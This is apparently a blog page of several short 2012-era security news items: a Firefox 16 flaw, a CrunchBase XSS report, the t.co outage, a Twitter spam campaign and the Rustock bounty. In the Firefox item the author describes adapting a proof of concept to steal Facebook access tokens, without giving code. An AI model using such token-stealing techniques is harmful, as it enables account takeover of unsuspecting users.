Firefox 16 vulnerability allows spammers to steal Facebook access tokens

Recently a researcher discovered a vulnerability in the latest version of Firefox ,v16.0, that allows attacker to gather detailed information about user browser history. Previous versions and later version are not affected.

Although it was initially believed that the vulnerability allow access to browser history, Mozilla representatives told Ars Technica that "the flaw allowed access to the URL of windows or frames to which the attacker has a reference only—generally the ones that the attacker opened."

Now, researcher published a proof-of-concept that demonstrate how an attacker collect your twitter account name when you click a button. The attacker opens a new window and load a specially crafted Twitter url that contains a personal Twitter ID. If a user signed in already, then hackers able to collect your twitter name.

When i read the story, I started to think in the Spammers' point of view. Recently, i report a Facebook scam that ask user to verify their account by pasting their access token in the hacker's site.

I have just modified the poc with the spammer's code to display the authentication token of facebook, Successfully it worked for me.

Yes, it is very easy for a hacker to steal the authentication token. Just one click is enough for hacker to gain your authentication token without much effort.

Reflected XSS Vulnerability in Crunchbase

Indian Security Researcher, Nikhil Kulkarni, has discovered Reflected Cross site scripting vulnerability in the official website of CrunchBase, a free wiki-style directory of people, technology companies, and investors.

The real name field in the User page  found to be vulnerable to XSS attack.  Nikhil immediately report about the vulnerability to TechCrunch  and was told not to disclose this issue until its rectified.

The security flaw was rectified after he reported but later again he was still able to find XSS again.  So he reported them again.

"And the reply I got was that the earlier when they fixed the XSS issue they found some other codes were breaking and hence forth they had to remove the XSS Prevention code." Researcher said.

The vulnerability successfully has been fixed now. 

Security News - Twitter's t.co mistakenly shut down by Melbourne IT

Twitters users were unable to access links in tweets on sunday as the Twitter's url shortening service t.co mistakenly shut down by Melbourne IT.

According to reports, the outage caused by simple human error at a Melbourne, Australia-based hosting firm. following a phishing complaint.

“Yesterday in the process of actioning a phishing complaint, our policy team inadvertently placed the t.co domain on hold. The error was realized and rectified in approximately 40 minutes and t.co links again began working,” stated Tony Smith, a spokesperson for Melbourne IT in a CNET interview.

At first, it seemed as though the problem was caused by Dyn, a New Hampshire-based company that provides domain name system connectivity for Twitter's t.co link shorting service as well as Zappos and Etsy. But Tom Daly, Dyn's chief scientist, said it was "an issue with the upstream parent zone, .co, the country code domain for Colombia."

Hacking News - Another Twitter Spam "Filming a new film ,starring Katt Williams"

Recently, I report in E Hacking News that the spammers are mentioning your name in the Tweets and asking for the suggestion.  Today, One of our Twitter friend, @backtracesec , give a hint to hunt  another Twitter spamming group.

In this campaign , the cyber criminals claimed that they are going to film a new movie starring Katt williams.   Katt Williams, an American comedian, rapper and actor. He is best known for his role as Money Mike in Friday After Next.

"@VictimAccount We're filming a new movie in your city starring Katt WilIiams ! We want you to be in it! go here @PerryCasting" The spam tweet reads.

Here, the spammer main account 'PerryCasting' hasn't tweeted anything but the tagline has the following text:

"Welcome! Please proceed now and confirm your availability for the film. FOLLOW THIS LINK · [bit_ly_Link]"

Just like the previous spam tweets, the link redirects to multiple sites .  In the end, it leads to '160tracker[dot]com' . A quick google search reveals that the site is being used by spammers.

I have collected fake twitter accounts that post the same tweets.  Here you can find the list of fake accounts:
http://pastebin.com/BRpeLuwt

If you think that i have missed some fake accounts, please feel free to send or comment the fake account.  If you report it to Twitter as spam, it will be better.

Which Social Networking Sites Are Secure? -Social Network Attacks

Zone Alarm released(1month back, sorry for late report) the top social network list based on the privacy. Also they report malware attacks in those social networks. see the following the image for the complete report.

Microsoft offering $250,000 reward for Rustock Botnet's info

Microsoft is offering reward of $250,000 for providing identification, arrest and criminal conviction of the individual(s) responsible for controlling the Rustock bot net

This Rustock bot net  enslaves around 1 million computers and force them to generate billion of spam mails. It is able to send 30 billion spam mails every day. This bot net leads to other crimes such advertising unapproved versions of pharmaceuticals.